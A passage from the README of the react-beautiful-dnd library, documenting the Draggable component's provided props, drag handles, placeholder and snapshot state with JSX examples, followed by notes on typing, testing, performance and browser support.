Drag me! </div> </div> ); }} </Draggable> Type information type DraggableStyle = DraggingStyle | NotDraggingStyle; type DraggingStyle = {| position: 'fixed', boxSizing: 'border-box', // allow scrolling of the element behind the dragging element pointerEvents: 'none', zIndex: ZIndex, width: number, height: number, top: number, left: number, transform: ?string, |} type NotDraggingStyle = {| transition: ?string, transform: ?string, pointerEvents: 'none' | 'auto', |} provided.placeholder (?ReactElement) The Draggable element has position:fixed applied to it while it is dragging. The role of the placeholder is to sit in the place that the Draggable was during a drag. It is needed to stop the Droppable list from collapsing when you drag. It is advised to render it as a sibling to the Draggable node. When the library moves to React 16 the placeholder will be removed from api. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > Drag me! </div> {/* Always render me - I will be null if not required */} {provided.placeholder} </div> )} </Draggable> provided.dragHandleProps (?DragHandleProps) every Draggable has a drag handle. This is what is used to drag the whole Draggable. Often this will be the same as the node as the Draggable, but sometimes it can be a child of the Draggable. DragHandleProps need to be applied to the node that you want to be the drag handle. This is a number of props that need to be applied to the Draggable node. The simpliest approach is to spread the props onto the draggable node ({...provided.dragHandleProps}). However, you are also welcome to monkey patch these props if you also need to respond to them. DragHandleProps will be null when isDragDisabled is set to true. Type information type DragHandleProps = {| onMouseDown: (event: MouseEvent) => void, onKeyDown: (event: KeyboardEvent) => void, onClick: (event: MouseEvent) => void, tabIndex: number, 'aria-grabbed': boolean, draggable: boolean, onDragStart: () => void, onDrop: () => void |} Standard example <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> )} </Draggable> Custom drag handle <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > <h2>Hello there</h2> <div {...provided.dragHandleProps}> Drag handle </div> </div> {provided.placeholder} </div> )} </Draggable> Monkey patching If you want to also use one of the props in DragHandleProps const myOnClick = (event) => console.log('clicked on', event.target); <Draggable draggableId="draggable-1"> {(provided, snapshot) => { const onClick = (() => { // dragHandleProps might be null if(!provided.dragHandleProps) { return myOnClick; } // creating a new onClick function that calls my onClick // event as well as the provided one. return (event) => { provided.dragHandleProps.onClick(event); // You may want to check if event.defaultPrevented // is true and optionally fire your handler myOnClick(event); } })(); return ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} onClick={onClick} > Drag me! </div> {provided.placeholder} </div> ); }} </Draggable> 2. snapshot: (StateSnapshot) type StateSnapshot = {| isDragging: boolean, |} The children function is also provided with a small about of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Draggable while it is being dragged. Note: if you want to change the cursor to something like grab you will need to add the style to the body. (See DragDropContext > style above) <Draggable draggableId="draggable-1"> {(provided, snapshot) => { const style = { ...provided.draggableStyle, backgroundColor: snapshot.isDragging ? 'blue' : 'grey', }; return ( <div> <div ref={provided.innerRef} style={style} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> ); }} </Draggable> Engineering health Typed This codebase is typed with flowtype to promote greater internal consistency and more resilient code. Tested This code base employs a number of different testing strategies including unit, performance and integration tests. Testing various aspects of the system helps to promote its quality and stability. While code coverage is not a guarantee of code health, it is a good indicator. This code base currently sits at ~95% coverage. Performance This codebase is designed to be extremely performant - it is part of its DNA. It builds on prior investigations into React performance that you can read about here and here. It is designed to perform the minimum number of renders required for each task. Highlights using connected-components with memoization to ensure the only components that render are the ones that need to - thanks react-redux, reselect and memoize-one all movements are throttled with a requestAnimationFrame - thanks raf-schd memoization is used all over the place - thanks memoize-one conditionally disabling pointer-events on Draggables while dragging to prevent the browser needing to do redundant work Minimal browser paints Minimal React updates Supported browsers This library supports the standard Atlassian supported browsers for desktop: Desktop Version Microsoft Internet Explorer(Windows) Version 11 Microsoft Edge Latest stable version supported Mozilla Firefox (all platforms) Latest stable version supported Google Chrome (Windows and Mac) Latest stable version supported Safari (Mac) Latest stable version on latest OS release supported Currently mobile is not supported. However, there are plans to add touch support in the future Author / maintainer Alex Reardon - @alexandereardon - areardon@atlassian.com Download react-beautiful-dnd-master.zip Source: https://github.com/atlassian/react-beautiful-dnd